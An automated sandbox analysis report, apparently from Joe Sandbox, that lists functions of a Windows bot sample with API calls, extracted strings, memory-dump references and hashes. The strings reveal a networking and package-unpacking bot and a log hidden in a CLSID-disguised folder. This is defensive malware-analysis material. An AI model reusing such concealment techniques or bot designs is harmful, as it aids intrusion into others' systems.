                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                                                                                                                                  • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                                                                                                                  • API String ID: 1104438493-906809513
                                                                                                                                                  • Opcode ID: bb568f17dd6a2e4523c81be14fcf721ce6dfccabb5d46468dc8857a08ea5cd7d
                                                                                                                                                  • Instruction ID: ab90251c725329c0c9ac5a2c3904effeaf8403c1050bee2b4bc8ccf9e426c462
                                                                                                                                                  • Opcode Fuzzy Hash: bb568f17dd6a2e4523c81be14fcf721ce6dfccabb5d46468dc8857a08ea5cd7d
                                                                                                                                                  • Instruction Fuzzy Hash: 2171CF71B0C28382FB209B4CE8C07B91250AF857D8F6569B2DF4F576A5DE2EF9498301
                                                                                                                                                  Function 00007FF8BFB85A5E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                                                                                                                                  • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                                                                                                                  • API String ID: 1104438493-906809513
                                                                                                                                                  • Opcode ID: 06752aa5a4281953a201f9da300dc2996c40b0526a77fcdae041027a90c7b52c
                                                                                                                                                  • Instruction ID: bc6e1a3ffb38801d94d25b8a651edbd589e382edbf2a1d18a8aa8eb8d96eef26
                                                                                                                                                  • Opcode Fuzzy Hash: 06752aa5a4281953a201f9da300dc2996c40b0526a77fcdae041027a90c7b52c
                                                                                                                                                  • Instruction Fuzzy Hash: 94717C12F0C64382FA605B9CE884BB92351AFD47E4F556136DB4E47A97FE2CA845CB01
                                                                                                                                                  Function 00007FF6BE039B8C Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 139stringfileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpin_mbscatfopen
                                                                                                                                                  • String ID: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$main.log$service
                                                                                                                                                  • API String ID: 3216678114-1460613360
                                                                                                                                                  • Opcode ID: 6f494a988963525dfc8c9e6694f7ed676b47cce2b4ff5cefa6908507d4734c9b
                                                                                                                                                  • Instruction ID: 9ef994839c132b5c9fa6b1b769b687498c06fe93de125967b3130e4475d8b35b
                                                                                                                                                  • Opcode Fuzzy Hash: 6f494a988963525dfc8c9e6694f7ed676b47cce2b4ff5cefa6908507d4734c9b
                                                                                                                                                  • Instruction Fuzzy Hash: F2514950E1C60381FA31A71DEA91BB932A1EF78744F940133F74DC62AADE6CA876C351
                                                                                                                                                  Function 00007FF6BE0379C0 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 193stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$_errno_mbscpy$_mbscatfopenfseek
                                                                                                                                                  • String ID: %TEMP%$(package != NULL)$(target != NULL)$H:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x)$[E] (%s) -> Failed(package=%s,target=%s,err=%08x)$[I] (%s) -> Done(package=%s,target=%s)$[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u)$package_unpack
                                                                                                                                                  • API String ID: 3066828623-625159688
                                                                                                                                                  • Opcode ID: 105523515e84c8d438c400628abfd7f6ba265d1413e23efcc273f54c6047ae63
                                                                                                                                                  • Instruction ID: 26bb098007f155212ce2f514bd9cdccf8e1a4530e59d955e4d8acabd3a7d78d4
                                                                                                                                                  • Opcode Fuzzy Hash: 105523515e84c8d438c400628abfd7f6ba265d1413e23efcc273f54c6047ae63
                                                                                                                                                  • Instruction Fuzzy Hash: 0C818061A0C74795FB209B19E8407AA6371FBAC784F885232FB4DD7685EE7CE519C700
                                                                                                                                                  Function 00007FF6BE038563 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 179stringmemoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$Heap_mbscpy$AllocFreeHandleLibraryModuleProcess
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(name=%s)$[I] (%s) -> Loaded(f_path=%s)$mem_alloc$unit_cleanup$unit_init$units_init
                                                                                                                                                  • API String ID: 548194777-214984806
                                                                                                                                                  • Opcode ID: d97ec5c473da84a818b1d6212fb4ba4403f3e876dd0ce6e9996ee0095170d0c4
                                                                                                                                                  • Instruction ID: 7b14420791e784e2a0539c6a89df1eb65fdb26da714f038924d8f7603966f7ca
                                                                                                                                                  • Opcode Fuzzy Hash: d97ec5c473da84a818b1d6212fb4ba4403f3e876dd0ce6e9996ee0095170d0c4
                                                                                                                                                  • Instruction Fuzzy Hash: 39815A61A0C64391FA719B09A951BBA23A1EFB8B84F444472FB4D877D5EF3CE526C310
                                                                                                                                                  Function 00007FF6BE033D81 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 199fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,service,000002234F5413D0,?,00007FF6BE0484F0,00007FF6BE0384E9), ref: 00007FF6BE033DD9
                                                                                                                                                  • LockFileEx.KERNEL32(?,?,?,?,?,?,?,?,?,service,000002234F5413D0,?,00007FF6BE0484F0,00007FF6BE0384E9), ref: 00007FF6BE033E12
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,000002234F5413D0,?,00007FF6BE0484F0,00007FF6BE0384E9), ref: 00007FF6BE033EE7
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,000002234F5413D0,?,00007FF6BE0484F0,00007FF6BE0384E9), ref: 00007FF6BE033FCC
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,service,000002234F5413D0,?,00007FF6BE0484F0,00007FF6BE0384E9), ref: 00007FF6BE034140
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleLock
                                                                                                                                                  • String ID: (lock != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$service
                                                                                                                                                  • API String ID: 2747014929-3958755462
                                                                                                                                                  • Opcode ID: 54ee31f5105c176933aa956faabb0ff0d66d276a4c84ab9d9d605d99f51c3a37
                                                                                                                                                  • Instruction ID: 9af39ffbe08a6649e6bebd5fb05859f29a298f741062ad6de40742c1479404f1
                                                                                                                                                  • Opcode Fuzzy Hash: 54ee31f5105c176933aa956faabb0ff0d66d276a4c84ab9d9d605d99f51c3a37
                                                                                                                                                  • Instruction Fuzzy Hash: BA816E20E0C74B81F630AB5CA580B7972709F78355E141633EB7ECB6D5EE2DA9A58302
                                                                                                                                                  Function 00007FF8BA4F256C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                                                                                                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                                                                                                  • API String ID: 3154682637-708158336
                                                                                                                                                  • Opcode ID: 14883c677a07027e0c611d24d643234e2c749e44aaac6b3bbce7a29d53d8c958
                                                                                                                                                  • Instruction ID: 8c3f13964719bf74d22d07f0491735eac483af7e144a91f758c2793bdfdf967c
                                                                                                                                                  • Opcode Fuzzy Hash: 14883c677a07027e0c611d24d643234e2c749e44aaac6b3bbce7a29d53d8c958
                                                                                                                                                  • Instruction Fuzzy Hash: 2D51C571A0C64282F6209B5CEC406BA3650EF467F4F5423B6DF2E466E5DF7EE6098700
                                                                                                                                                  Function 00007FF8B915256C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                                                                                                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                                                                                                  • API String ID: 3154682637-708158336
                                                                                                                                                  • Opcode ID: 480825a7f3e30da42117ec77c43a9a645fda6539583568eb973d0f60dc714624
                                                                                                                                                  • Instruction ID: 1743b3714314608f29ace11e4a20f0004e5f4b84467e38a7000053a60e9eaadd
                                                                                                                                                  • Opcode Fuzzy Hash: 480825a7f3e30da42117ec77c43a9a645fda6539583568eb973d0f60dc714624
                                                                                                                                                  • Instruction Fuzzy Hash: 0151E162E0C6C342E6608F2DE8502BA7B51AF857E4F140735DB2E86AE5EE7CF545E700
                                                                                                                                                  Function 00007FF8B91850EC Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                                                                                                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                                                                                                  • API String ID: 3154682637-708158336
                                                                                                                                                  • Opcode ID: 140c814d8350784d58d8024ff37c9b0f12ab94c9893da5a29beb4d75926b9086
                                                                                                                                                  • Instruction ID: de474c9d2c9ad6b980b99baed5f8b6aa1678db97d3a3f7e6e52bb6d4fb79f21f
                                                                                                                                                  • Opcode Fuzzy Hash: 140c814d8350784d58d8024ff37c9b0f12ab94c9893da5a29beb4d75926b9086
                                                                                                                                                  • Instruction Fuzzy Hash: A851A021B0C6C242EA205F5EE8803B97651EF447F4F141376EA6E476E6EE7CE506B701
                                                                                                                                                  Function 00007FF8BFB526AC Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                                                                                                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                                                                                                  • API String ID: 3154682637-708158336
                                                                                                                                                  • Opcode ID: 48bcb164c9fc3a4126ab8f11bb80280af38d06ad61882bf559dc1bdf0a13afbf
                                                                                                                                                  • Instruction ID: 0af79300722918e36015c8b8e59689991538625a6491e75bffb0e3765fa95fc6
                                                                                                                                                  • Opcode Fuzzy Hash: 48bcb164c9fc3a4126ab8f11bb80280af38d06ad61882bf559dc1bdf0a13afbf
                                                                                                                                                  • Instruction Fuzzy Hash: D051A221A0D64292FA209FADE820679B750EF967E4F140335EB2D47AE5EE7CF9058700
                                                                                                                                                  Function 00007FF8BFB81C3C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                                                                                                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                                                                                                  • API String ID: 3154682637-708158336
                                                                                                                                                  • Opcode ID: 8f4af5b9be33e707085e38c83d552142371c392916469796192cdc7cbced4af1
                                                                                                                                                  • Instruction ID: 97a53e246706e74a661dee50ec7589796c367e2b6a0b2d83f33e373b99cdf991
                                                                                                                                                  • Opcode Fuzzy Hash: 8f4af5b9be33e707085e38c83d552142371c392916469796192cdc7cbced4af1
                                                                                                                                                  • Instruction Fuzzy Hash: 8251D361A0E64282FA249FEDE8002B97350AFC57E4F148335DB6E87AD6EE7CE405C700
                                                                                                                                                  Function 00007FF8BA4F1D21 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                                                                                                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                                                                                                  • API String ID: 1412730629-3633878399
                                                                                                                                                  • Opcode ID: f00f92d452ba0ff8bb84cbfee4095df9768404c10da2e6ff7e6b6f0979107802
                                                                                                                                                  • Instruction ID: 533fb7e0412b4342545e5949de53efe37aa7aca2835d2d2ddb604ac18b7de31c
                                                                                                                                                  • Opcode Fuzzy Hash: f00f92d452ba0ff8bb84cbfee4095df9768404c10da2e6ff7e6b6f0979107802
                                                                                                                                                  • Instruction Fuzzy Hash: EF510620A0D70382FB74575CA8C43782661AF173E4F6427B7CF2E462E1DF6EBA859215
                                                                                                                                                  Function 00007FF8B9151D21 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
